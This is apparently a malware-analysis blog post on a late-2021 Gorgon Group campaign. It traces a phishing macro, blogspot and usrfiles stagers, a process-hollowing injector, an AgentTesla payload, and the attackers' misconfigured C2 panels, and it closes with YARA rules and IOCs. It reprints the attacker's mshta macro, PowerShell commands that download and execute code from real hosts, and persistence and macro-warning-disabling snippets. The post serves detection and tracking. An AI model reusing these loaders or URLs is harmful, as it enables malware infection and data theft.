2021 Gorgon Group APT Operation

alosh_rat_github alosh_rat_github

This article unveils the last 2021 Gorgon Group campaign, including the technical details regarding the infection chain and the various multi-stage payloads, its C&C architecture, a tracking of the infected computer across the study, and finally, a way to automate the tracking of the campaign and the payload extraction.

All of the IOCs are available here.



  • TL;DR
    • Stage 0 : Downloader Macro
    • Stage 1 : JS / Powershell Downloader
    • Stage 2 : Injector wrapper
    • Stage 3 : The Alosh/3losh Injector case
    • Stage 4 : AgentTesla Final Payload
  • Automation
  • IOCs
    • Blogspots URL (stage 1)
    • UsrFiles URL (stage 2)
    • C&C Lists
    • YARA Rules



This late 2021 campaign leverage an in-memory-infection chain to drop the AgentTesla malware on the infected computer, initiated by some phishing emails.

The infection chain uses a modular architecture, based on legit online services (“blogspot.com” pages and “usrfiles.com”) that respectively serves some JS/PowerShell command and a process hollowing tool.

A final AgentTesla v3 payload is then injected in the memory of a legitilimate process on the infected computer.

At least half of the infected computer are Indonesian or related to the Indonesian industry. Through a misconfiguration on the C&C servers, we can observe the evolution of the “botnet” and track the infected computers.

A lot of them are in critical company, related to various areas: alosh_rat_github

The whole infection chain can be summarized by this diagram: alosh_rat_github

Each steps of the infection chain will be described in the following chapters. alosh_rat_github

Stage 0 : Downloader Macro

From the batch of analyzed phishing e-mails from this campaign, it seems that the most of them are leveraging the auto_open() VBA function to execute some arbitrary code when they are opened with the macro enabled.

The VBA script in the malicious macro is not sophisticated nor obfuscated. Its goal is to load a remote JavaScript snippet through the “Mshta.exe” legitimate binary.

Here is an example of such a VBA macro that can be found in this campaign:

Enum myenum
    myname1 = 1
    myname2 = 2
    myname3 = 3
    myname4 = 4
End Enum
Public Function getEnumName(eValue As myenum)
Select Case eValue
    Case 1
        getEnumName = "mshta"
    Case 2
        getEnumName = "http://www.bitly.com/doaksodksueasdweu"
    End Select
End Function

Public Function calc()
    Set calc = GetObject(StrReverse("000045355444-E94A-EC11-972C-02690731:wen"))
End Function

Sub auto_open()
    Dim Total As New clean
    Dim NamakTotal, lora As String
    NamakTotal = Total.getEnumName(1)
    lora = Total.getEnumName(2)
    koko = lora
    Total. calc. ShellExecute NamakTotal, koko
End Sub

The reduced “bitly.com” link points to a blogspot page made by the attacker, which looks empty at first glance: banner


Stage 1 : JS / Powershell Downloader

By taking a deeper look at the JavaScript embedded in the blogspot page, we can spot the fact that this page contains a script that is supposed to be ran remotely by the mshta instance from the previous stage.

Depending on the analyzed page, or even on the timing when this operation was monitored, the scripts embedded in the various webpages may change.

This allows the operator to update the victims without the need to re-infect them or the re-compile its payloads.

A total of 97 malicious active blogpost pages were identified and dumped. These pages do not always share the same scripts. This repository contains a copy of the dumps made during the monitoring of this campaign.

For instance, some scripts were very small and straight forward in order to load the next stage without doing much more.

Some other were adding an intermediary persistence mechanism. For instance, this variant is adding an entry in the “Run” registry key to make this stage 1 payload survive a reboot:

pink = "pOwersHelL.exe -w h i'E'x(iwr('<url>') -useB);i'E'x(iwr(<url>') -useB);i'E'x(iwr('<url>') -useB);"

Const tpok = &H80000001
lopaskkk = "."
Set kasodkmwm = GetObject("winmgmts:\\" & lopaskkk & "\root\default:StdRegProv")
poloaosd = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
akosdwdjdw = "care"
kasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink

In the same fashion, this other one is setting up a scheduled tasked:

function MainAccess1()
Megacall  "schtas", "k" , "s /crea","te /sc MINUTE /mo 80 /tn """"Bluefibonashi"""" /" , "F /tr """"\""""M" , "s" , "H" , "t" , "A""""\""""<url>"""""
End function

Some others versions of these scripts were spotted cleaning the stage 0 parents process and disabling the macro warning messages:

MicrosoftWINdows.Run "taskkill /f /im winword.exe", 0
MicrosoftWINdows.Run "taskkill /f /im Excel.exe", 0

MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
MicrosoftWINdows.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"

This shows that the payloads are not homogeneous, even if they share the same objective: loading the next stage from another remote website.

As for the previous snippets, the part where the next stage is loaded is an obfuscated PowerShell command:

akosdwdjdw = "takeCare"
SubQueryPath akosdwdjdw,"pOweRshell.exe -w h I`E`X([System.IO.Strea"+"mReader]::new( [System.Net.WebRequest]"+"::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_974d936d2f6d4e52831d05712c24a1c9.txt').Ge"+"tResponse().GetResponse"+"Stream()).Rea"+"dToend());I`E`X([System.IO.StreamReader]::new( [Sy"+"stem.Net.WebRequest]::Cre"+"ate('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt').GetResponse().GetResponseStream()).ReadToend());"

This command gave us the next stage payload location : the “usrfiles.com” platform.

A list of the monitored “usrfiles.com” links can be found in the last part of this document.

A total of 101 malicious “usrfiles.com” pages were monitored for this analysis.

At this point of the infection, everything is fileless as the payloads are never written down to the infected computer disk, making it harder for monitoring tools to detect the infection.


Stage 2 : Injector wrapper

Depending on the monitored blogpost / usrfiles endpoint, several payloads can be found.

They usually share the same goal: loading the next stage in memory using PowerShell.

Some lightweight PowerShell obfuscation methods are used.

For instance, in this first variant, the strings are built character by character and the injector compiled binary + the final payload are respectively stored as a PowerShell byte array and a compressed ZIP byte array:

[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202, [...])
Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,204,189,9,152,92,69,181,56,126, [...])
$nan = "R"+"e"+"g"+"A"+"s"+"m"+"."+"e"+"x"+"e"
[Object[]] $Params=@($MyPt.Replace("F"+"r"+"a"+"m"+"e"+"w"+"or"+"k"+"6"+"4","F"+"r"+"a"+"mew"+"o"+"r"+"k") ,$Bytes)

Some versions are embedding the final payload as a non-compressed byte-array.

Another variant is compiling the target DLL (final stage) at runtime:

$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
$v1 = "Sys@@@".Replace("@@@","tem.dll")
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"

Finally, some variants are adding a quick persistence mechanism using the “Startup” folder while doing some antivirus detection:

Move-Item -Path "C:\Users\Public\Micropoft.vbs" -Destination "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Micropoft.vbs" -Force -Verbose
if([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){
elseif([System.IO.File]::Exists("C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe")){
elseif([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){

These injectors are signed by the “Alosh/3losh RAT” author.

#by code 3losh rat


Stage 3 : The Alosh/3losh Injector case

The next stage of the infection chain seems to leverage the same compiled injector file every time, even if the injected content (the final payload) is not always the same.

A dozen of infection chain were related to the injector with the following hash:


I’ve made a YARA rule to detect more of those injectors in the wild:

rule Alosh_Process_Hollowing_Mana_Campaign {
      	author = "HomardBoy"
        description = "Alosh RAT process hollowing program linked to the 2021 Gorgon Group APT"
        $str1 = "alosh" ascii
        $str2 = "projFUD" ascii
        $str3 = "ZwUnmapViewOfSec" ascii
        $str4 = "ResumeThread" ascii
        $str5 = "WriteProcessMem" ascii
        $str6 = "VirtualAll" ascii
        $str7 = "CreateProc" ascii
        (uint16(0) == 0x5a4d and all of ($str*))

This injector is not that new, and was already linked to previous Gorgon Group campaigns [5].

This tool is heavily advertised on social medias, along with some other packers/exploits. The YouTube channel named “3loshrat” shows a demonstration of how to use the injector, and its configurations options:


The attentive reader will notice the presence of the “jsc.exe” available target in this screenshot, which is the same as the hardcoded injection target in the downloader wrapper from the stage 2.

The injector is advertised on many social media by the “3loshRAT” account:






Those social media accounts are advertising various “Alosh/3losh RAT” products, while the YouTube channel provide some demonstration of the actual tools.

"crypter . powershell . vb . c# for sale all programs"

A GitHub account with the same name and the same profile picture can also be found: alosh_rat_github

Regarding the actual injector itself:

The original name of this compiled DLL is straight forward: “runpe.dll”.

This binary, which is written in .Net, is linked to the Alosh/3losh RAT product through its file descriptions:

[assembly: AssemblyCopyright("Copyright ©  2022")]
[assembly: AssemblyTitle("3lostrat")]
[assembly: AssemblyDescription("3lostrat")]
[assembly: AssemblyProduct("3lostrat")]
[assembly: AssemblyCompany("3lostrat")]

The author of this piece of code saw far ahead for the copyright date of this sample, which indicate the fact that this injector is still in its early life.

The goal of the binary is to inject an arbitrary binary, using a process hollowing technique (given by the second argument to the injector) in the process space named after the first given argument.

Almost all the stage 2 wrapper scripts were using the hardcoded target process name “C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe” to inject the next stage in it.

This simple injector can be summarized to the following code:

alosh_rat.CreateProcessA(arg2_path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 134217732U, IntPtr.Zero, null, ref startupInformation, ref processInformation);
alosh_rat.ZwUnmapViewOfSection(alosh_rat.ZwUnmapViewOfSection, processInformation.ProcessHandle, num11
alosh_rat.WriteProcessMemory(processInformation.ProcessHandle, num9 + num7, arg1_buffer, array2.Length, ref num5);
losh_rat.ResumeThread(alosh_rat.ResumeThread, processInformation.ThreadHandle)]

This code, which follows the standard Process Hollowing technique, seems inspired from this repository: “https://github.com/NYAN-x-CAT/CSharp-RunPE/blob/master/RunPE/RunPE.cs” as it share a lot of similarities with the Alosh / 3losh version (minor the execution flow scrambling using some basic opaque predicates).

The injected payload (which is the final one of the infection stage) is a customized AgentTesla v3 malware. alosh_rat_github

Stage 3 : AgentTesla Final Payload

The final payload is a customized version of the AgentTesla malware. It will periodically make some screenshots of the infected computer screen, act as a keylogger when receiving a special order and steal the victim’s browser cookies and passwords.

The technical detailed analysis of this AgentTesla version is available here.


C2 Infrastructure

The login page of the command and controls servers is a really unique one: alosh_rat_github

This login page is almost the same as the legacy AgentTelsa one, with a custom background and some reference to the “Mana” string.

This “Mana” strings, the logo and the custom background allows linking this panel to the Gorgon Group APT [4], as they seem to keep this login page along campaigns [1].

Unit 42’s researchers linked this characteristic panel to the “Aggah” threat actor, which is associated to the Gorgon Group APT.

The late 2019/early 2021 campaigns were leveraging the same panel, but with the label “version 3”, and was attributed to the GorgonGroup/Hagga APT by various researcher [2] [3].

Each server hold a list of 30 panels on average. They all share the same URL format between servers. The root directory is identified with a single letter: ‘/j’ or ‘/k’, for instance. Then a unique identifier is used to separate each panels: ‘/j/p1a’, ‘/j/p2b’, ‘/j/p3c’, …


Almost of the monitored servers were misconfigured, resulting in an open-directory at the web server’s root directory.

The “/files” directory is interesting, as it contains the stolen data from the victims.

With this access, it is possible to monitor the evolution of the number of victims in time:


As seen in the introduction, we can spot a lot of infected computers in some critical area. alosh_rat_github alosh_rat_github

This one seems related to the tracking of credit card delivery: alosh_rat_github alosh_rat_github

This one is an infected computer inside what seems to be a datacenter: alosh_rat_github alosh_rat_github

Here is a medical tracking system: alosh_rat_github alosh_rat_github

And here is another instance with a customs service platform related to the Indonesian government: alosh_rat_github alosh_rat_github

Many more other sensitive companies were infected, in a lot of different area, along with some personal computer of citizens all around the world.

Something odd is the fact that one of the hosted panel stores a lot of infected computers from major Indonesian companies. From my observations, an average of 54% of the infected computer are Indonesians or related to Indonesians companies.



In order to build some hunting rules for the newer AgentTesla payload used in this campaign, a static configuration extractor was built in Python. It allows extracting the campaign ID of the compiled final payload, and its gate URL.

This script is available at https://github.com/GuillaumeOrlando/Daily-Malware-Analysis/tree/main/2021_11_12.

It allows tracking new panels with ease, or to map new samples with existing panels endpoints:

python3 AgentTesla_Static_conf_extractor.py /tmp/sample_1.dmp 
campaign id    :
panel          : af2926ce207b2bc813c89d939aaa2b01138ddda63b46416647288d31a75bd226
MD5 agentTesla : 57ef73ca8f0afbc260638c1dd668e4e4

python3 AgentTesla_Static_conf_extractor.py /tmp/sample_2.dmp 
campaign id    :
panel          : d322164f81cf3f5c5c576a12e60be6fb27e4cc2e72085f500be81fda18272486
MD5 agentTesla : c004124914c09d28a9bd99806e58605a

python3 AgentTesla_Static_conf_extractor.py /tmp/sample_3.dmp 
campaign id    :
panel          : 520585c44a0f6fbdbaaf7c43b8291f9421b2d1006eedfcbfbf17e7e60ff87abc
MD5 agentTesla : b354a9e859952e1fcb1f2e27650ec5c9
python3 AgentTesla_Static_conf_extractor.py /tmp/sample_4.dmp 
campaign id    :
panel          : b7e3573f18d53fb1647bf056583e3e284c2acb1b7f0a2f29592db8c80076d83e
MD5 agentTesla : 4425f4efa71c8709a2666d4478f382ce

In order to gain access to those payloads, 3 additional scripts were created to automate the tracking of the movement of the actor.

The first one is used to extract the stage 1 payload (JavaScript payload) for a set of given blogspot URL:

python3 blog_payload_extract.py 
[*] Processing https://thethingsidontknowwhattyodo.blogspot.com/p/reza.html
[-] Site is inactive

[*] Processing https://madarbloghogya.blogspot.com/p/rezaback.html
[+] Saved under ./Export/2022-01-03/https:__madarbloghogya_blogspot_com_p_rezaback_html


[*] Processing http://gagamutakakachota.blogspot.com/p/14.html
[+] Saved under ./Export/2022-01-03/gagamutakakachota_blogspot_com_p_14_html

[*] Processing http://bukbukbukak.blogspot.com/p/10.html
[+] Saved under ./Export/2022-01-03/bukbukbukak_blogspot_com_p_10_html
[+] Saved under ./Export/2022-01-03/bukbukbukak_blogspot_com_p_10_html


['https://deb43e46-145f-4ebd-abfb-69a78b67bacf.usrfiles.com/ugd/deb43e_dd2f1039bd3c48049b0fe8a43876696d.txt', 'https://edf41f52-452f-4671-a310-1da9f1d2ecd8.usrfiles.com/ugd/edf41f_bb78879731a0487482704dc64fe7ea35.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_79970a68042f4c559ecba9a6c0753477.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_d4cfd75cb13d41ed8bd4901ba7f73486.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_c4a4bb865f064f7699177ea225ae3e1e.txt', 'https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_f8e7e6376b0445489701e08a2ac113f3.txt', 'https://edf41f52-452f-4671-a310-1da9f1d2ecd8.usrfiles.com/ugd/edf41f_ce2d90cb820948d1b3ff03671cba6629.txt', 'https://ia801407.us.archive.org/8/items/98-Crypted-July-15/11-1.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_c03282f4d8d243ee85b4a2cdfcf13e03.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_9d775712a62b454fac37f7bc3f043f4a.txt', 'https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_41d623bedfed4d6699da0a48fb1073ad.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_c1a3c91ebfc44a30a40588868038aad7.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_614a57872785484eac552a79943cc83a.txt', 'https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_5b3a3866f3d74b139c05fe46089ff019.txt']

Payload extract: ./Payloads/f0526bc7f32b879f170786e21061b425.dmp
Payload extract: ./Payloads/c721fa5ee7d7eb8336baeaab72390b3f.dmp
Payload extract: ./Payloads/7fb91a9310a590dc4fc91f0183c3c5a9.dmp
Payload extract: ./Payloads/8f6578c81e677eb963c7c8164c414ee3.dmp

These blogspot URL can be retrieved with the help of this small VirusTotal graph that I made): alosh_rat_github

With those extracted stage 1 and the “usrfiles” extracted URL, we can now obtain the “3losh Injector” binary and the injected content with the help of another script that will simply download the stage 2 and 3 payloads.

Payload extract: ./Payloads/loader_0/b1a471709f6fb58395e9c81a44f94bd7.dmp
Payload extract: ./Payloads/loader_0/f0b34ba48bf68057e6c5e68837141aab.dmp
Payload extract: ./Payloads/loader_0/b85fb5255a15d091277b8518d02500ce.dmp
Payload extract: ./Payloads/loader_0/ddb91a90eed20724950c62d3e15a7a10.dmp
Payload extract: ./Payloads/loader_0/4ef90c180e81bb4c7834c0da5872092c.dmp
Payload extract: ./Payloads/loader_0/f0526bc7f32b879f170786e21061b425.dmp

Finally, the last script will parse the extracted payloads to retrieve the last AgentTesla payload, ready to be analyzed:

Processing: ./Payloads/loader_0/d6578c9f4802043a011ff44b79753636.dmp
  Alosh RAT type 1 (powershell Byte array version)
  new written to ./Payloads/loader_1/new_d6578c9f4802043a011ff44b79753636.dmp (MD5: 57ef73ca8f0afbc260638c1dd668e4e4)
  H1 written to ./Payloads/loader_1/H1_d6578c9f4802043a011ff44b79753636.dmp (MD5: 404afe734de0bd19d2a25f85f28c860d)
Processing: ./Payloads/loader_0/ddb91a90eed20724950c62d3e15a7a10.dmp
  Alosh RAT type 1 (powershell Byte array version)
  new written to ./Payloads/loader_1/new_ddb91a90eed20724950c62d3e15a7a10.dmp (MD5: c004124914c09d28a9bd99806e58605a)
  H1 written to ./Payloads/loader_1/H1_ddb91a90eed20724950c62d3e15a7a10.dmp (MD5: 404afe734de0bd19d2a25f85f28c860d)
  Unknown payload, skiping ...
Processing: ./Payloads/loader_0/c86a89bfbb6695378fb207de8578d206.dmp
  Alosh RAT type 2 (C# version)
  0_array written to ./Payloads/loader_1/0_array_c86a89bfbb6695378fb207de8578d206.dmp (MD5: 7a8213b118b2c50cb31a17ef2412194d)
  1_array written to ./Payloads/loader_1/1_array_c86a89bfbb6695378fb207de8578d206.dmp (MD5: e9c6b40bc5e5c33b2f4cb32bd3ce3d1a)
Processing: ./Payloads/loader_0/4ef90c180e81bb4c7834c0da5872092c.dmp
  Alosh RAT type 2 (C# version)
  0_array written to ./Payloads/loader_1/0_array_4ef90c180e81bb4c7834c0da5872092c.dmp (MD5: 7a8213b118b2c50cb31a17ef2412194d)
  1_array written to ./Payloads/loader_1/1_array_4ef90c180e81bb4c7834c0da5872092c.dmp (MD5: eff0328870ecb6461aadba65abaeb06e)



The full list of the IOCs observed during this analysis can be downloaded here

Here is a small snippet of those:

blogspot URLs (10):
Usrfiles URLs (10):
AgentTesla Hash (10):
Infection vector Hash (pptx, xls, docx) (10)
C2 Server list & Gates (10):
http[:]//[.]php (gate)
http[:]//[.]php (gate)
http[:]//[.]php (gate)

http[:]//[.]php (gate)
http[:]//[.]php (gate)

http[:]//[.]php (gate)


  • [1] https://www.riskiq.com/blog/external-threat-management/mana-tools-malware-c2-panel/
  • [2] https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/
  • [3] https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Aggah
  • [4] https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Gorgon%20Group
  • [5] https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html